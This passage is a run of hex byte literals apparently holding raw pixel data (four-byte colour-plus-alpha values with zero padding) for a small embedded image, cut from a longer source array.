0xde, 0xf3, 0xff, 0x3e, 0xdd, 0xf4, 0xff, 0x4d, 0xdc, 0xf2, 0xff, 0x59, 0xdc, 0xf1, 0xff, 0x59, 0xdc, 0xf1, 0xff, 0x51, 0xdb, 0xf2, 0xff, 0x46, 0xdc, 0xf3, 0xf8, 0x77, 0xdf, 0xe8, 0x40, 0xa9, 0xd7, 0xd7, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xce, 0xce, 0xce, 0x07, 0xdc, 0xdc, 0xdc, 0x08, 0xd9, 0xd9, 0xd9, 0x0b, 0xe0, 0xd5, 0xd3, 0x0c, 0x64, 0xe4, 0xf1, 0x3f, 0x0e, 0xdd, 0xfa, 0xfb, 0x16, 0xd8, 0xf9, 0xff, 0x1b, 0xd8, 0xf8, 0xff, 0x20, 0xda, 0xf8, 0xff, 0x2a, 0xda, 0xf6, 0xff, 0x2d, 0xdb, 0xf6, 0xff, 0x30, 0xdc, 0xf5, 0xff, 0x71, 0xe0, 0xee, 0xff, 0x92, 0xe3, 0xee, 0xff, 0xa4, 0xe5, 0xee, 0xff, 0xaf, 0xe7, 0xee, 0xff, 0xb4, 0xe8, 0xef, 0xff, 0xb3, 0xe8, 0xee, 0xff, 0xb4, 0xe9, 0xee, 0xff, 0xb7, 0xe9, 0xee, 0xff, 0xb5, 0xe9, 0xee, 0xff, 0xb9, 0xea, 0xee, 0xff, 0xbc, 0xea, 0xee, 0xff, 0xbb, 0xea, 0xee, 0xff, 0xb7, 0xea, 0xee, 0xff, 0xb7, 0xea, 0xee, 0xff, 0xb6, 0xe9, 0xee, 0xff, 0xb0, 0xe9, 0xee, 0xff, 0xa8, 0xe8, 0xee, 0xff, 0x9c, 0xe6, 0xed, 0xff, 0x86, 0xe5, 0xed, 0xff, 0x73, 0xe3, 0xee, 0xff, 0x75, 0xe3, 0xee, 0xff, 0x78, 0xe3, 0xee, 0xff, 0x77, 0xe2, 0xee, 0xff, 0x6f, 0xe1, 0xef, 0xff, 0x65, 0xdf, 0xf0, 0xff, 0x5d, 0xdf, 0xf0, 0xff, 0x30, 0xdd, 0xf5, 0xff, 0x26, 0xdc, 0xf7, 0xff, 0x2a, 0xdb, 0xf6, 0xff, 0x2f, 0xdb, 0xf5, 0xff, 0x31, 0xda, 0xf6, 0xff, 0x2f, 0xd9, 0xf6, 0xff, 0x31, 0xd9, 0xf5, 0xff, 0x24, 0xe2, 0xf7, 0xf0, 0x00, 0xf9, 0xff, 0x08, 0x00, 0xec, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xcf, 0xcf, 0xcf, 0x07, 0xcd, 0xcd, 0xcd, 0x10, 0xce, 0xce, 0xce, 0x18, 0xd1, 0xcb, 0xca, 0x17, 0x93, 0xdc, 0xe6, 0x2f, 0x4a, 0xd8, 0xf1, 0x6c, 0x2d, 0xd8, 0xf5, 0x8c, 0x27, 0xd9, 0xf7, 0xb3, 0x25, 0xd9, 0xf7, 0xff, 0x33, 0xda, 0xf5, 0xff, 0x3c, 0xda, 0xf3, 0xff, 0x4d, 0xdb, 0xf1, 0xff, 0x7b, 0xe0, 0xee, 0xff, 0x92, 0xe2, 0xee, 0xff, 0xa7, 0xe5, 0xee, 0xff, 0xb7, 0xe8, 0xef, 0xff, 0xbd, 0xe9, 0xef, 0xff, 0xbe, 0xea, 0xef, 0xff, 0xba, 0xe9, 0xef, 0xff, 0xb5, 0xe9, 0xee, 0xff, 0xb2, 0xe8, 0xee, 0xff, 0xb5, 0xe9, 0xee, 0xff, 0xb8, 0xe9, 0xee, 0xff, 0xb8, 0xe9, 0xee, 0xff, 0xb4, 0xe9, 0xee, 0xff, 0xad, 0xe8, 0xee, 0xff, 0xa8, 0xe8, 0xee, 0xff, 0xa3, 0xe7, 0xee, 0xff, 0xa2, 0xe7, 0xee, 0xff, 0x9c, 0xe6, 0xed, 0xff, 0x89, 0xe4, 0xed, 0xff, 0x74, 0xe2, 0xee, 0xff, 0x6d, 0xe2, 0xef, 0xff, 0x6c, 0xe1, 0xef, 0xff, 0x67, 0xe1, 0xef, 0xff, 0x58, 0xdf, 0xf1, 0xff, 0x4d, 0xde, 0xf2, 0xff, 0x40, 0xdd, 0xf3, 0xff, 0x26, 0xdd, 0xf7, 0xff, 0x17, 0xdc, 0xf9, 0xff, 0x11, 0xdb, 0xfb, 0xff, 0x13, 0xdb, 0xfa, 0xff, 0x16, 0xd9, 0xfa, 0xf3, 0x1a, 0xd8, 0xf8, 0xa7, 0x1b, 0xd8, 0xf7, 0x83, 0x2a, 0xd9, 0xf7, 0x53, 0x00, 0xf1, 0xff, 0x13, 0x00, 0xec, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe1, 0xe1, 0xe1, 0x00, 0xe9, 0xe9, 0xe9, 0x00, 0xd3, 0xd3, 0xd3, 0x07, 0xce, 0xce, 0xce, 0x13, 0xd9, 0xd9, 0xd9, 0x24, 0xd8, 0xd8, 0xd8, 0x2c, 0xd9, 0xd9, 0xd9, 0x2c, 0xe5, 0xdd, 0xdb, 0x24, 0xf1, 0xd7, 0xd0, 0x24, 0x73, 0xde, 0xea, 0x60, 0x34, 0xd8, 0xf5, 0xff, 0x48, 0xda, 0xf3, 0xff, 0x53, 0xdb, 0xf2, 0xff, 0x73, 0xde, 0xef, 0xff, 0x99, 0xe3, 0xee, 0xff, 0xa1, 0xe4, 0xee, 0xff, 0xab, 0xe6, 0xee, 0xff, 0xba, 0xe9, 0xef, 0xff, 0xc3, 0xea, 0xef, 0xff, 0xc5, 0xea, 0xef, 0xff, 0xc7, 0xeb, 0xef, 0xff, 0xc1, 0xea, 0xef, 0xff, 0xbb, 0xe9, 0xee, 0xff, 0xbd, 0xea, 0xef, 0xff, 0xbc, 0xea, 0xee, 0xff, 0xbc, 0xea, 0xee, 0xff, 0xba, 0xea, 0xef, 0xff, 0xb0, 0xe8, 0xee, 0xff, 0xa7, 0xe7, 0xee, 0xff, 0x9e, 0xe6, 0xed, 0xff, 0x98, 0xe6, 0xed, 0xff, 0x98, 0xe6, 0xed, 0xff, 0x95, 0xe5, 0xed, 0xff, 0x8b, 0xe3, 0xee, 0xff, 0x7e, 0xe2, 0xee, 0xff, 0x76, 0xe1, 0xef, 0xff, 0x74, 0xe0, 0xef, 0xff, 0x6b, 0xdf, 0xf0, 0xff, 0x5c, 0xde, 0xf0, 0xff, 0x46, 0xdd, 0xf3, 0xff, 0x2a, 0xdc, 0xf6, 0xff, 0x19, 0xdc, 0xf9, 0xff, 0x0b, 0xda, 0xfc, 0xff, 0x08, 0xda, 0xfd, 0xff, 0x06, 0xda, 0xfd, 0xec, 0x76, 0xe4, 0xf8, 0x1b, 0xff, 0xcb, 0x8c, 0x04, 0xff, 0xff, 0xe8, 0x00, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xcf, 0xcf, 0xcf, 0x00, 0xce, 0xce, 0xce, 0x04, 0xd3, 0xd3, 0xd3, 0x13, 0xd6, 0xd6, 0xd6, 0x1c, 0xdb, 0xdb, 0xdb, 0x34, 0xdd, 0xdd, 0xdd, 0x58, 0xdc, 0xdc, 0xdc, 0x5f, 0xdb, 0xdb, 0xdb, 0x4f, 0xcf, 0xdb, 0xda, 0x4f, 0x60, 0xde, 0xf0, 0xdf, 0x66, 0xdb, 0xf0, 0xff, 0x7d, 0xde, 0xef, 0xff, 0x91, 0xe1, 0xee, 0xff, 0xa6, 0xe4, 0xee, 0xff, 0xb5, 0xe7, 0xef, 0xff, 0xb4, 0xe7, 0xee, 0xff, 0xaf, 0xe6, 0xee, 0xff, 0xbd, 0xe9, 0xef, 0xff, 0xc9, 0xeb, 0xef, 0xff, 0xd2, 0xed, 0xf1, 0xff, 0xd9, 0xee, 0xf1, 0xff, 0xd1, 0xec, 0xf0, 0xff, 0x9a, 0xe5, 0xee, 0xff, 0x97, 0xe5, 0xee, 0xff, 0xb8, 0xe9, 0xee, 0xff, 0xbd, 0xe9, 0xef, 0xff, 0xbc, 0xe9, 0xef, 0xff, 0xbc, 0xea, 0xef, 0xff, 0xbb, 0xe9, 0xef, 0xff, 0xaf, 0xe8, 0xee, 0xff, 0xa0, 0xe5, 0xee, 0xff, 0x93, 0xe4, 0xee, 0xff, 0x8e, 0xe4, 0xee, 0xff, 0x8f, 0xe4, 0xee, 0xff, 0x90, 0xe4, 0xee, 0xff, 0x8b, 0xe2, 0xee, 0xff, 0x8d, 0xe3, 0xee, 0xff, 0x89, 0xe2, 0xee, 0xff, 0x7b, 0xe0, 0xee, 0xff, 0x5a, 0xdd, 0xf1, 0xff, 0x34, 0xdc, 0xf5, 0xff, 0x19, 0xdb, 0xf9, 0xff, 0x08, 0xdb, 0xfd, 0xff, 0x07, 0xd9, 0xfd, 0xff, 0x02, 0xd9, 0xfe, 0xff, 0x00, 0xe6, 0xff, 0x83, 0x00, 0xef, 0xff, 0x00, 0xfa, 0xfb, 0xfb, 0x03, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xdc, 0xdc, 0xdc, 0x00, 0xe0, 0xe0, 0xe0, 0x07, 0xce, 0xce, 0xce, 0x18, 0xd4, 0xd4, 0xd4, 0x1c, 0xd7, 0xd7, 0xd7, 0x28, 0xdb, 0xdb, 0xdb, 0x54, 0xdd, 0xdd, 0xdd, 0x67, 0xdf, 0xde, 0xde, 0x64, 0xb3, 0xdf, 0xe5, 0x80, 0x72, 0xde, 0xef, 0xf8, 0x93, 0xe0, 0xee, 0xf8, 0xad, 0xe5, 0xee, 0xfb, 0xb3, 0xe6, 0xee, 0xfc, 0xbf, 0xe9, 0xef, 0xff, 0xc9, 0xea, 0xef, 0xff, 0xc6, 0xea, 0xef, 0xff, 0xb7, 0xe7, 0xee, 0xff, 0xbb, 0xe8, 0xef, 0xff, 0xc3, 0xea, 0xef, 0xff, 0xc6, 0xea, 0xf0, 0xff, 0xce, 0xec, 0xf0, 0xff, 0xdf, 0xef, 0xf1, 0xff, 0x9d, 0xe5, 0xee, 0xff, 0x5b, 0xdf, 0xf0, 0xff, 0x8d, 0xe3, 0xee, 0xff, 0xb6, 0xe8, 0xef, 0xff, 0xbe, 0xea, 0xef, 0xff, 0xc1, 0xea, 0xef, 0xff, 0xc3, 0xea, 0xef, 0xff, 0xc2, 0xea, 0xef, 0xff, 0xb7, 0xe8, 0xef, 0xff, 0x8e, 0xe3, 0xee, 0xff, 0x86, 0xe3, 0xee, 0xff, 0x91, 0xe3, 0xee, 0xff, 0x92, 0xe3, 0xee, 0xff, 0x90, 0xe3, 0xee, 0xff, 0x89, 0xe2, 0xee, 0xff, 0x8c, 0xe2, 0xee, 0xff, 0x8b, 0xe1, 0xee, 0xff, 0x76, 0xdf, 0xef, 0xff, 0x52, 0xdb, 0xf1, 0xff, 0x1f, 0xda, 0xf8, 0xff, 0x09, 0xd9, 0xfc, 0xf7, 0x04, 0xd8, 0xfd, 0xec, 0x02, 0xd9, 0xfe, 0xef, 0x00, 0xde, 0xfe, 0xff, 0x00, 0xfb, 0xff, 0x08, 0x75, 0xee, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xcf, 0xcf, 0xcf, 0x00, 0xcd, 0xcd, 0xcd, 0x0b, 0xd6, 0xd6, 0xd6, 0x20, 0xda, 0xda, 0xda, 0x24, 0xd4, 0xd4, 0xd4, 0x2f, 0xd9, 0xd9, 0xd9, 0x3f, 0xdb, 0xdb, 0xdb, 0x43, 0xdc, 0xdb, 0xdb, 0x4b, 0xc6, 0xdb, 0xdf, 0x5c, 0xc3, 0xdd, 0xe3, 0x7c, 0xd5, 0xe2, 0xe5, 0x9f, 0xe8, 0xea, 0xeb, 0xc7, 0xb9, 0xe8, 0xef, 0xff, 0xbe, 0xe8, 0xef, 0xff, 0xc1, 0xe9, 0xef, 0xff, 0xc1, 0xe9, 0xef, 0xff, 0xc3, 0xea, 0xef, 0xff, 0xaf, 0xe6, 0xee, 0xff, 0xab, 0xe6, 0xee, 0xff, 0xae, 0xe6, 0xee, 0xff, 0xb7, 0xe8, 0xee, 0xff, 0xbb, 0xe9, 0xef, 0xff, 0x86, 0xe2, 0xee, 0xff, 0x33, 0xde, 0xf5, 0xff, 0x3c, 0xde, 0xf4, 0xff, 0x7e, 0xe1, 0xee, 0xff, 0xa3, 0xe5, 0xee, 0xff, 0x8a, 0xe3, 0xef, 0xff, 0x98, 0xe4, 0xee, 0xff, 0xa9, 0xe6, 0xee, 0xff, 0x9c, 0xe4, 0xee, 0xff, 0x79, 0xe1, 0xee, 0xff, 0x66, 0xe0, 0xf0, 0xff, 0x90, 0xe3, 0xee, 0xff, 0x96, 0xe3, 0xee, 0xff, 0x8c, 0xe2, 0xee, 0xff, 0x82, 0xe1, 0xee, 0xff, 0x7c, 0xe0, 0xee, 0xff, 0x78, 0xde, 0xef, 0xff, 0x6d, 0xdd, 0xef, 0xff, 0x56, 0xdc, 0xf2, 0xff, 0x1d, 0xd9, 0xf9, 0xff, 0x0b, 0xd9, 0xfc, 0xd3, 0x42, 0xdc, 0xfc, 0x1c, 0x00, 0xd8, 0xfd, 0x1c, 0x00, 0xd7, 0xfe, 0x28, 0x00, 0xee, 0xff, 0x0f, 0x00, 0xea, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xd6, 0xd6, 0xd6, 0x00, 0xd5, 0xd5, 0xd5, 0x0c, 0xd9, 0xd9, 0xd9, 0x2b, 0xd5, 0xd5, 0xd5, 0x33, 0xdb, 0xdb, 0xdb, 0x3b, 0xda, 0xda, 0xda, 0x40, 0xd8, 0xd8, 0xd8, 0x3b, 0xd9, 0xd9, 0xd9, 0x34, 0xd9, 0xd9, 0xd9, 0x3f, 0xda, 0xda, 0xda, 0x54, 0xe0, 0xdf, 0xdf, 0x74, 0xd4, 0xe6, 0xe8, 0xbb, 0xa1, 0xe3, 0xee, 0xff, 0xaa, 0xe4, 0xee, 0xff, 0xb3, 0xe6, 0xef, 0xff, 0xb1, 0xe6, 0xef, 0xff, 0xb3, 0xe7, 0xef, 0xff, 0x9b, 0xe3, 0xee, 0xff, 0x89, 0xe0, 0xee, 0xff, 0x92, 0xe2, 0xee, 0xff, 0x95, 0xe2, 0xee, 0xff, 0x90, 0xe2, 0xee, 0xff, 0x7c, 0xe0, 0xef, 0xff, 0x3a, 0xdd, 0xf4, 0xff, 0x1f, 0xdf, 0xf8, 0xff, 0x3b, 0xde, 0xf4, 0xff, 0x78, 0xe1, 0xee, 0xff, 0x68, 0xdf, 0xf0, 0xff, 0x51, 0xde, 0xf1, 0xff, 0x78, 0xe1, 0xef, 0xff, 0x82, 0xe1, 0xee, 0xff, 0x69, 0xdf, 0xef, 0xff, 0x3d, 0xde, 0xf4, 0xff, 0x5b, 0xde, 0xf1, 0xff, 0x98, 0xe3, 0xee, 0xff, 0x92, 0xe2, 0xee, 0xff, 0x6c, 0xde, 0xf0, 0xff, 0x61, 0xdd, 0xf0, 0xff, 0x54, 0xdc, 0xf1, 0xff, 0x48, 0xdb, 0xf3, 0xff, 0x3d, 0xd9, 0xf4, 0xff, 0x17, 0xd9, 0xfa, 0xff, 0x07, 0xda, 0xfd, 0xe7, 0x4c, 0xe9, 0xfa, 0x18, 0xff, 0xff, 0xff, 0x03, 0xff, 0xff, 0xff, 0x00, 0xae, 0xae, 0xae, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe2, 0xe2, 0xe2, 0x00, 0xe7, 0xe7, 0xe7, 0x07, 0xd3, 0xd3, 0xd3, 0x20, 0xd4, 0xd4, 0xd4, 0x30, 0xda, 0xda, 0xda, 0x3c, 0xdb, 0xdb, 0xdb, 0x50, 0xdb, 0xdb, 0xdb, 0x50, 0xd8, 0xd8, 0xd8, 0x40, 0xd6, 0xd6, 0xd6, 0x38, 0xda, 0xda, 0xda, 0x4b, 0xe3, 0xdf, 0xde, 0x63, 0x94, 0xe2, 0xeb, 0xc4, 0x7d, 0xde, 0xef, 0xff, 0x8a, 0xe0, 0xee, 0xff, 0xa0, 0xe2, 0xed, 0xf3, 0x91, 0xe1, 0xee, 0xfc, 0x78, 0xde, 0xef, 0xff, 0x6c, 0xdd, 0xef, 0xff, 0x6a, 0xdd, 0xef, 0xff, 0x77, 0xdf, 0xee, 0xff, 0x87, 0xe1, 0xee, 0xff, 0x8b, 0xe1, 0xee, 0xff, 0x6d, 0xde, 0xef, 0xff, 0x46, 0xdd, 0xf3, 0xff, 0x24, 0xdd, 0xf7, 0xff, 0x22, 0xdd, 0xf7, 0xff, 0x39, 0xdd, 0xf5, 0xff, 0x3b, 0xdd, 0xf4, 0xff, 0x28, 0xdd, 0xf7, 0xff, 0x43, 0xdd, 0xf3, 0xff, 0x67, 0xdf, 0xef, 0xff, 0x64, 0xde, 0xef, 0xff, 0x3e, 0xdc, 0xf3, 0xff, 0x30, 0xdc, 0xf5, 0xff, 0x53, 0xdd, 0xf1, 0xff, 0x69, 0xdd, 0xef, 0xff, 0x3a, 0xdb, 0xf4, 0xff, 0x2c, 0xda, 0xf6, 0xff, 0x32, 0xda, 0xf5, 0xff, 0x2a, 0xda, 0xf7, 0xf7, 0x27, 0xd8, 0xf6, 0xe3, 0x12, 0xd9, 0xfa, 0xff, 0x05, 0xda, 0xfd, 0xff, 0x1a, 0xe3, 0xfe, 0x2c, 0xfc, 0xfa, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xcb, 0xcb, 0xcb, 0x00, 0xc5, 0xc5, 0xc5, 0x03, 0xd9, 0xd9, 0xd9, 0x0f, 0xcf, 0xcf, 0xcf, 0x18, 0xd8, 0xd8, 0xd8, 0x23, 0xda, 0xda, 0xda, 0x43, 0xda, 0xda, 0xda, 0x53, 0xda, 0xda, 0xda, 0x4b, 0xda, 0xda, 0xda, 0x3c, 0xda, 0xda, 0xda, 0x37, 0xda, 0xd9, 0xd8, 0x40, 0x6d, 0xdc, 0xee, 0xa8, 0x93, 0xdb, 0xea, 0x9f, 0xd7, 0xe0, 0xe1, 0x83, 0xd8, 0xe2, 0xe4, 0xa0, 0x74, 0xdd, 0xef, 0xf8, 0x44, 0xda, 0xf3, 0xff, 0x35, 0xda, 0xf5, 0xff, 0x41, 0xdb, 0xf4, 0xff, 0x59, 0xdb, 0xf1, 0xff, 0x74, 0xde, 0xef, 0xff, 0x78, 0xdf, 0xee, 0xff, 0x62, 0xdd, 0xf0, 0xff, 0x54, 0xdc, 0xf1, 0xff, 0x3d, 0xdc, 0xf4, 0xff, 0x26, 0xdc, 0xf7, 0xff, 0x20, 0xdc, 0xf7, 0xff, 0x19, 0xdc, 0xf9, 0xff, 0x11, 0xdd, 0xfa, 0xff, 0x1e, 0xdc, 0xf8, 0xff, 0x3f, 0xdc, 0xf3, 0xff, 0x4f, 0xdd, 0xf2, 0xff, 0x2b, 0xdc, 0xf6, 0xff, 0x1d, 0xdb, 0xf8, 0xff, 0x21, 0xdb, 0xf7, 0xff, 0x2f, 0xdb, 0xf5, 0xff, 0x19, 0xda, 0xf9, 0xff, 0x12, 0xd9, 0xfb, 0xff, 0x1b, 0xd9, 0xf8, 0xff, 0x16, 0xd9, 0xf8, 0xf3, 0xff, 0xd9, 0x73, 0x0f, 0x7e, 0xd5, 0xe6, 0x37, 0x29, 0xd7, 0xfa, 0x7f, 0x16, 0xe2, 0xfe, 0x48, 0x00, 0xe1, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xde, 0xde, 0xde, 0x03, 0xd7, 0xd7, 0xd7, 0x08, 0xdb, 0xdb, 0xdb, 0x0b, 0xdb, 0xdb, 0xdb, 0x0f, 0xd3, 0xd3, 0xd3, 0x28, 0xda, 0xda, 0xda, 0x38, 0xda, 0xda, 0xda, 0x3c, 0xda, 0xda, 0xda, 0x2c, 0xd5, 0xd5, 0xd5, 0x1f, 0xe0, 0xcb, 0xc6, 0x13, 0xde, 0xd8, 0xd6, 0x28, 0xdb, 0xda, 0xda, 0x47, 0xc6, 0xdf, 0xe4, 0x88, 0x6c, 0xdc, 0xef, 0xfb, 0x40, 0xd9, 0xf4, 0xff, 0x20, 0xd9, 0xf8, 0xff, 0x25, 0xd9, 0xf7, 0xfb, 0x3a, 0xda, 0xf4, 0xff, 0x50, 0xdb, 0xf2, 0xff, 0x54, 0xdb, 0xf2, 0xff, 0x48, 0xdb, 0xf2, 0xff, 0x4c, 0xdb, 0xf2, 0xff, 0x4b, 0xdb, 0xf2, 0xff, 0x38, 0xdc, 0xf4, 0xff, 0x22, 0xdb, 0xf7, 0xff, 0x11, 0xdb, 0xfa, 0xff, 0x0a, 0xdc, 0xfc, 0xff, 0x0d, 0xdb, 0xfb, 0xff, 0x1d, 0xdc, 0xf9, 0xff, 0x37, 0xda, 0xf5, 0xff, 0x2a, 0xda, 0xf6, 0xff, 0x12, 0xdb, 0xfa, 0xff, 0x0d, 0xd9, 0xfc, 0xff, 0x0a, 0xda, 0xfc, 0xff, 0x09, 0xda, 0xfd, 0xff, 0x06, 0xd9, 0xfd, 0xff, 0x0e, 0xd8, 0xfb, 0xff, 0x0f, 0xda, 0xf9, 0xff, 0xff, 0xb1, 0x00, 0x07, 0xdb, 0xd2, 0xcf, 0x0f, 0xf4, 0xd9, 0xcc, 0x0c, 0xfc, 0xd3, 0xc5, 0x04, 0xff, 0xff, 0xff, 0x00, 0xfc, 0xfc, 0xfc, 0x00, 0xae, 0xae, 0xae, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0xbe, 0xbe, 0xbe, 0x03, 0xc5, 0xc5, 0xc5, 0x03, 0xcc, 0xcc, 0xcc, 0x04, 0xc5, 0xc5, 0xc5, 0x0c, 0xd1, 0xd1, 0xd1, 0x17, 0xdc, 0xdc, 0xdc, 0x20, 0xd4, 0xd4, 0xd4, 0x0c, 0xdd, 0xdd, 0xdd, 0x07, 0xd1, 0xd1, 0xd1, 0x0b, 0xdb, 0xdb, 0xdb, 0x1b, 0xa3, 0xda, 0xe7, 0x60, 0x3b, 0xd9, 0xf4, 0xf4, 0x50, 0xd9, 0xf2, 0xc7, 0x98, 0xd5, 0xe0, 0x2f, 0x10, 0xda, 0xfa, 0xc4, 0x0d, 0xd8, 0xfb, 0xff, 0x09, 0xda, 0xfb, 0xff, 0x24, 0xd9, 0xf8, 0xff, 0x2c, 0xd9, 0xf6, 0xff, 0x32, 0xdb, 0xf5, 0xff, 0x41, 0xdb, 0xf4, 0xff, 0x49, 0xda, 0xf3, 0xff, 0x39, 0xdb, 0xf5, 0xff, 0x15, 0xda, 0xfa, 0xff, 0x08, 0xdb, 0xfc, 0xff, 0x07, 0xda, 0xfd, 0xff, 0x0d, 0xda, 0xfc, 0xff, 0x14, 0xdb, 0xfa, 0xff, 0x10, 0xda, 0xfb, 0xff, 0x0a, 0xd9, 0xfc, 0xff, 0x08, 